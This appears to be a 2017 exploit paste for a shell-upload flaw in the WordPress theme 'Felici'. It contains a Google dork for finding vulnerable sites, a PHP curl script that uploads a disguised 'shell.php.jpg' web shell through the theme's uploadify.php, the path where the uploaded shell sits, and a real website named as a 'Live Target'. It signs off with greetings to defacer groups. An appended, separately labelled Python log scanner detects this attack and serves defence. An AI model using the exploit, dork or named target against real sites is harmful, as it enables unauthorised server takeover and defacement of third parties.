[POC] Wordpress Theme Felici Shell Upload

Berandal666 Mar 16th, 2017 309 Never
#################################################################################
# Wordpress Themes Felici Shell Upload Vulnerability
# Author : Berandal
# Google Dork: inurl:"/wp-content/themes/felici/"
# Tested on: Win 7, Linux
# Blog : http://www.maxteroit.com/
#################################################################################

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

# [!] Exploit : http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php

# [!] File Location : http://127.0.0.1/wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/shell.php.jpg

#################################################################################
#[*] Exploiter:
#################################################################################
<?php

$uploadfile="shell.php.jpg";

$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
#################################################################################
# Live Target:
http://trendingchannel.com/wp-content/themes/felici/sprites/js/uploadify/uploadify.php
#################################################################################
# [*] ABOUT:
#################################################################################
# Facebook: https://www.facebook.com/owlsquad.id
# Twitter: https://www.twitter.com/id_berandal
# Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
#################################################################################
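
A defensive check for the two paths named in this paste, added here as an example and not part of the original paste: it scans web-server access logs (combined log format assumed) for POSTs to the uploadify.php endpoint and for requests to script-named files in the upload directory, then correlates the two per client. The function names, sample log lines and addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Both paths come from the paste; the log lines below are constructed samples.
UPLOAD_ENDPOINT = "/wp-content/themes/felici/sprites/js/uploadify/uploadify.php"
UPLOAD_DIR = "/wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/"
# Apache/nginx combined log format: ip - - [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
# Script extension anywhere in the file name: shell.php.jpg, x.phtml, y.php5.gif
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)

SAMPLE_LOG = [  # constructed lines using documentation-range addresses
    '203.0.113.7 - - [16/Mar/2017:10:01:02 +0000] "POST /wp-content/themes/felici/sprites/js/uploadify/uploadify.php HTTP/1.1" 200 1 "-" "curl"',
    '203.0.113.7 - - [16/Mar/2017:10:01:09 +0000] "GET /wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/shell.php.jpg HTTP/1.1" 200 512 "-" "curl"',
    '198.51.100.4 - - [16/Mar/2017:10:05:00 +0000] "GET /wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/MyFont.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [16/Mar/2017:10:06:00 +0000] "POST /wp-content/themes/felici/sprites/js/uploadify/uploadify.php HTTP/1.1" 403 0 "-" "-"',
]

def scan(lines):
    """Return (ip, time, kind, path) for each request that touches the upload flow."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, ts, method, raw_path, status = m.groups()
        path = unquote(raw_path.split("?", 1)[0])  # drop query string, decode %xx
        name = path.rsplit("/", 1)[-1]
        if method == "POST" and path.lower() == UPLOAD_ENDPOINT:
            kind = "upload_accepted" if status.startswith("2") else "upload_rejected"
        elif path.lower().startswith(UPLOAD_DIR) and SCRIPT_EXT_RE.search(name):
            kind = "script_name_in_upload_dir"
        else:
            continue
        findings.append((ip, ts, kind, path))
    return findings

def correlated_clients(findings):
    """Clients that had an upload accepted and also requested a script-named file."""
    uploaded = {f[0] for f in findings if f[2] == "upload_accepted"}
    fetched = {f[0] for f in findings if f[2] == "script_name_in_upload_dir"}
    return sorted(uploaded & fetched)

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(*hit, sep="  ")
    print("correlated:", correlated_clients(hits))
```

A client in the correlated list is the strongest signal; an accepted POST on its own still means the endpoint is reachable and the theme's uploadify.php should be removed or blocked.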